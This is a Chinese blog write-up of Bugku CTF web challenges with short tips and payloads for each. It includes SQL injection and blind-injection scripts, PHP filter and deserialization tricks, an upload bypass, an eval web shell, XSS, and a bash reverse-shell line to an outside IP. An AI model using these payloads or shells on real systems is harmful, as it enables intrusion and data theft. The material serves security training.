Bugku writeup(Web)

2018/07/27 CTF CTF 15765 words views

最近在做 bugku 上的题目,感觉题目对于我这种入门级的 CTF 选手还是挺友好的,索性就记录一下,下面直接给 tips 或 tricks 或 payload,主要是 web 的题目。持续更新……

1.web2

tips:

直接看源码

2.文件上传测试

tips:

上传 PHP 文件,并将Content-Type: text/php改成Content-Type: image/jpeg

3.计算器

tips:

修改maxlength

4.web基础$_GET

payload:

?what=flag

5.web基础$_POST

tips:

注意将Content-Type改成Content-Type: application/x-www-form-urlencoded

6.矛盾

payload:

index1.php?num=1a

7.web3

tips:

查看源码,html 字符实体

8.sql注入

tips:

查看源码,看到gb2312想到宽字节注入

之后就是按照 sql 注入最一般的套路来就可以了

payload:

?id=1%df%27 union select 1,string from `key` where id=1%23

9.域名解析

tips:

修改本地的 hosts 表

10.SQL注入1

tips:

结合 strip_tags()函数,%3C%3E <==> <>

11.你必须让他停下

tips:

关闭网页的 JS, 查看源码,刷新几次就可以得到 flag

12.本地包含

payload:

<1> hello=);print_r(file("flag.php")
<2> hello=);var_dump(file("flag.php")
<3> hello=file("flag.php")
<4> hello=);include(@$_POST['b']
    在POST区域:b=php://filter/convert.base64-encode/resource=flag.php
<5> hello=);include("php://filter/convert.base64-encode/resource=flag.php"

13.变量1

payload:

/index1.php?args=GLOBALS

14.web5

tips:

题目有提示JSPFUCK

转码即可

15.头等舱

tips:

题目即提示,看响应头。

16.网站被黑

tips:

网站被黑就一定有 webshell,扫描网站目录,得到 webshell 地址;然后暴破 webshell 地址。

16+1 管理员系统

这道题少了账号的密码,看别人的 writeup 才知道是 test123

后面的就是简单的 XFF

17.web4

tips:

看源码,然后进行 url 转码,稍微看下 js 代码则题目可解。

18.flag在index里

payload:

http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php

19.输入密码查看flag

tips:

burpsuite 暴破

20.点击一百万次

主要看下这里的 js 代码:

var form = $('<form action="" method="post">' +
						'<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
						'</form>');
						$('body').append(form);
						form.submit();

tips:

POST x...xx

clicks=1000001

21.备份是个好习惯

tips:

1.备份文件源码泄漏( 备份文件一般情况是在后缀名后加的*.swp*.bak)

2.弱类型比较,md5突破

22.成绩单

payload:

step1: 判断注入点

  1. 1' 不显示, 怀疑这里存在注入点

  2. 1' or 1=1# 正常显示,明显存在注入点

step2: 判断字段数

  1. 1' order by 5# 不显示,说明字段数不是 5

  2. 1' order by 4# 正常显示,说明字段数是 4

step3: 看回显哪些字段

  1. -1' union select 1,2,3,4# 可以看到回显哪些字段

step4: 最后就是 SQL 注入固定的套路了

  1. -1' union select 1,2,3,database()# 查询数据库 —> skctf_flag
  2. -1' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf_flag'# 查询表名 —> fl4g
  3. -1' union select 1,2,3,column_name from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g'# 查询字段名 —> skctf_flag
  4. 知道字段名和表名了,我们可以直接查询我们的目标数据了:-1' union select 1,2,3,skctf_flag from fl4g#

23.秋名山老司机

payload:

#encoding:utf-8
import requests
from bs4 import BeautifulSoup

r = requests.Session()

url = "http://120.24.86.145:8002/qiumingshan/"
response = r.get(url)
soup = BeautifulSoup(response.text, "html.parser")

divList = soup.find_all("div")
#print eval(divList[0].string[:-3])

post = eval(divList[0].string[:-3])
data = {"value":post} 
print(data)
flag = r.post(url, data=data)

print(flag.text)

24.速度要快

#encoding:utf-8
import requests
import base64

url = "http://120.24.86.145:8002/web6/"
r = requests.session()
response = r.get(url)
flag = response.headers['flag']
key = base64.b64decode(flag)
key = str(key, encoding="utf-8")
print(key)

key = key.split(" ")[1]
key = str(base64.b64decode(key), encoding="utf-8")
print(key)

data = {"margin":key}
response = r.post(url, data=data)
print(response.text)

25.cookies欺骗

tips:

1.获取 index.php 文件的源码

#encoding:utf-8
import requests

url = "http://120.24.86.145:8002/web11/index.php?line={0}&filename=aW5kZXgucGhw"
r = requests.session()

ans = ""
for i in range(20):
	response = r.get(url.format(i))
	ans += response.text

print(ans)

2.分析源码,构造 cookie 即可

26.XSS

tips:

< >被过滤了,使用Unicode编码绕过查看原理

\u003c\u003e来代替< >

payload:

id=\u003cscript\u003ealert(__key__)\u003c/script\u0003e

27.never give up

https://pengyang.me/2018/08/13/bk_ng/

28.welcome to bugkuctf

tips:

step1:

GET /test1/?txt=php://input&file=php://filter/convert.base64-encode/resource=hint.php 

welcome to the bugkuctf
<?php  
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  
?>  

step2:

GET /test1/?txt=php://input&file=php://filter/convert.base64-encode/resource=index.php 

welcome to the bugkuctf
<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
		echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

我们之前绕过第一个 if ,要想绕过第二个,进入到 else 里面,这里就要利用 PHP 的反序列化漏洞。

payload:

<?php
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  

$flag = new Flag();
$flag->file = "flag.php";
echo serialize($flag);
?>  
/test1/?password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}&file=hint.php&txt=php://input

29.过狗一句话

用assert执行任意代码 payload

payload:http://120.24.86.145:8010/?s=print_r(scandir('./')); 扫描目录

参考:php代码/命令执行漏洞

30.字符?正则?

tips:

<?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

其实就是匹配这个正则表达式:

/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i

keykeyaaaaakey:/a/keyb,

31.前女友(SKCTF)

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

1.弱比较突破

2.strcmp突破

payload:

/?v1[]=1&v2[]=2&v3[]=3

32.login1(SKCTF)

tips:

step1: 先注册

username: admin...空格...1
password: PASSword1

step2: 直接登录

username: admin
password: PASSword1

33.你从哪里来

tips:

Referer: https://www.google.com

34.md5 collision(NUPT_CTF)

tips:

题目暗示得已经很清楚了,弱类型比较的漏洞

/md5.php?a=240610708

35.程序员本地网站

tips:

X-Forwarded-For:127.0.0.1

36.各种绕过

<?php 
highlight_file('flag.php'); 
$_GET['id'] = urldecode($_GET['id']); 
$flag = 'flag{xxxxxxxxxxxxxxxxxx}'; 
if (isset($_GET['uname']) and isset($_POST['passwd'])) { 
    if ($_GET['uname'] == $_POST['passwd']) 

        print 'passwd can not be uname.'; 

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 

        die('Flag: '.$flag); 

    else 

        print 'sorry!'; 

} 
?>

payload:

POST /web7/?id=margin&uname[]=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded

passwd[]=1

也可以用SHA1碰撞

37.web8

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
GET /web8/?ac=test&fn=php://input HTTP/1.1

test

38.细心

tips:

robots.txt

/resusl.php?x=admin

39.求getshell

更改后缀名来得到flag,php别名

php2, php3, php4, php5, phps, pht, phtm, phtml …
Content-Type: Multipart/form-data;

-----------------------------160788178818824807152124289401
Content-Disposition: form-data; name="file"; filename="test.php5"
Content-Type: image/jpeg

<?php
echo "hack";
?>
-----------------------------160788178818824807152124289401
Content-Disposition: form-data; name="submit"

Submit
-----------------------------160788178818824807152124289401--

如果是waf严格匹配,通过修改 Content-type 后字母的大小写可以绕过检测, 使得需要上传的文件可以到达服务器端,而服务器的容错率较高, 一般我们上传的文件可以解析。

40.INSERT INTO注入

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>

Tips XXF 注入,基于时间的盲注

select case when 条件 then 执行1 else 执行2

substr(X,1,1) --> substr() from 1 for 1

payload

11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23


暴出数据库名

#encoding: utf-8
import requests
import string

mystring = string.ascii_letters+string.digits+string.punctuation
url='http://120.24.86.145:8002/web15/'
data = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') then sleep(5) else 1 end)) #"
flag = ''

for i in range(1,10):
    for j in mystring:
        try:
            headers = {'x-forwarded-for':data.format(str(i),j)}
            res = requests.get(url,headers=headers,timeout=4)
        except requests.exceptions.ReadTimeout:
            flag += j
            print(flag)
            break

print('The database name is '+flag)

41.这是一个神奇的登陆框

tips:

step1:

admin_name=admin&admin_passwd=1" order by 2#&submit=GO+GO+GO

step2:

admin_name=admin&admin_passwd=1" union select database(),2#&submit=GO+GO+GO

后面就是常规的注入手法了

42.多次

https://pengyang.me/2018/08/03/bk_dc/

43.PHP_encrypt_1(ISCCCTF)

加密后的数据

fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

加密算法:

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $char = "";
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

tips:

写出对应的解密算法即可:

<?php

function decrypt($str){
    $str = base64_decode($str);
    $len = strlen($str);
    $key = md5('ISCC');
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen){
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i<$len ; $i++) {        
        if (abs(ord($str[$i])-ord($char[$i])+128)>128) {
        	$flag .= chr(abs(ord($str[$i])-ord($char[$i])));
        }else{
        	$flag .= chr(abs(ord($str[$i])-ord($char[$i])+128));
        }
    }
    return $flag;
}


$s = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";

$res = decrypt($s);
echo $res;
?>

44.文件包含2

tips:

//shell.jpg
<script language=php>system("ls")</script>

//shell.jpg
<script language=php>echo "test";eval($_POST['shell']);</script>
用菜刀连接这个
http://118.89.219.210:49166/index.php?file=upload/201808160804143541.jpg

参考:文件包含2

45.flag.php

tips: 又是一道反序列化的题目

<?php 
error_reporting(0); 
include_once("flag.php"); 
$cookie = $_COOKIE['ISecer']; 
if(isset($_GET['hint'])){ 
    show_source(__FILE__); 
} 
elseif (unserialize($cookie) === "$KEY") 
{    
    echo "$flag"; 
} 
else { 
?>
<?php 
} 
$KEY='ISecer:www.isecer.com'; 
?>

前面那个key是空的

构造 payload:

<?php
	$ISecer = '';
	echo  serialize($ISecer);
?>
//s:0:"";

46.sql注入2

tips:

.DS_Store泄露,.DS_Store 是 Mac OS X 系统中的临时文件,其中可能存放与目录相关的敏感信息。

用这个.DS_Store利用工具

47.孙xx的博客

tips:

1.信息收集,登录wp后台;

2.在插件的文件里面,写入一句话,然后用蚁剑连一下,就可以获取到flag.

48.报错注入

tips:

​```
?id=1/**/and/**/updatexml(1,concat(0x7e,(select/**/@@version),0x7e),1)

?id=1/**/and/**/updatexml(1,concat(0x7e,substr(load_file(0x2f7661722f746573742f6b65795f312e706870),50,100),0x7e),1)

0x2f7661722f746573742f6b65795f312e706870
/var/test/key_1.php

49.Trim的日记本

tips

/show.php

50.login2(SKCTF)

tips:

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
    /*这里查询后 $row['password'] 会返回两个值:(1)admin的密码;(2)md5(1)。
    要想让这里只返回一个值那么就要让用户名不存在
    */
}

构造 payload:

username=admin' union select md5(1),md5(1)#&password=1

之后反弹 shell 即可

|bash -i >& /dev/tcp/47.XXX.XXX.146/8888 0>&1

51.login3(SKCTF)

https://pengyang.me/2018/08/05/bk_login3/

52.文件上传2(湖湘杯)

payload:

/?op=php://filter/read=convert.base64-encode/resource=flag

52+1 SSI

直接搜 SSI 可以找到这篇参考文章:https://blog.csdn.net/wutianxu123/article/details/82724637

payload:

<!--#include virtual="/etc/passwd" -->

参考:https://skysec.top/2018/11/16/EIS-2018-web/

52+2 江湖魔头

http://123.206.31.85:1616/wulin.php?action=start

查看源码,发现三个 JS 文件script.jsmd5.jsbase64.js

//script.js
function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}

function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}

function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if (-1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    }, 1000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    }, 2000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    }, 3000);
    setTimeout(function () {
        document.getElementById("attack-1").src = "image/6.png"
    }, 4000);
    setTimeout(function () {
        alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
    }, 5000)
}

重点关注一下ertqwe()

在 Console 执行以下代码

>var test = getCookie('user');
undefined
>test
"UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHBoaZ1liZxQMWEFDXl8EdUUOCwwId016B34WUlFWWTVoATEAB3J5P3Z2CmYgPTY5Pj90FSUUFRkfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo%2FBTzBxKbu6fbrB%2BH%2Bps3nsLrP6dCs0LgR8fj1%2F%2B6y3%2B%2FapJ3XnJnkjNPf0NnRjpPD7pjzzfaMiJDcxt%2FXkP%2FB%2BI2C5vTqgUE%3D"

>test = decodeURIComponent(test)
"UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHBoaZ1liZxQMWEFDXl8EdUUOCwwId016B34WUlFWWTVoATEAB3J5P3Z2CmYgPTY5Pj90FSUUFRkfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo/BTzBxKbu6fbrB+H+ps3nsLrP6dCs0LgR8fj1/+6y3+/apJ3XnJnkjNPf0NnRjpPD7pjzzfaMiJDcxt/XkP/B+I2C5vTqgUE="

>test = decode_create(test)
"O:5:"human":10:{s:8:"xueliang";i:822;s:5:"neili";i:548;s:5:"lidao";i:72;s:6:"dingli";i:97;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:0;s:4:"flag";s:1:"0";}"

修改 money 属性值,然后再对 cookie 明文进行加密处理

<?php
	function encode($payload){
		$result = '';
		for ($i=0; $i < strlen($payload); $i++) { 
			$b = ord($payload[$i]);
			$b = $b + (($i % 10) + 2);
			$b = $b ^ $i;
			$result = $result.chr($b);
		}
		return $result;
	}
	$payload = 'O:5:"human":10:{s:8:"xueliang";i:822;s:5:"neili";i:548;s:5:"lidao";i:72;s:6:"dingli";i:97;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"0";}';
	echo base64_encode(encode($payload));
	//encodeURIComponent()
?>
 
 // 上面之所以这样来写是为了逆向 decode_create()函数的过程
function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}

53.login4

https://pengyang.me/2018/09/19/CBC/

至此 web 篇全部搞定,后续如果有题目更新,这里也会持续更新……


上一篇: 追忆似水年华
下一篇: 博客皮肤

Search

    Table of Contents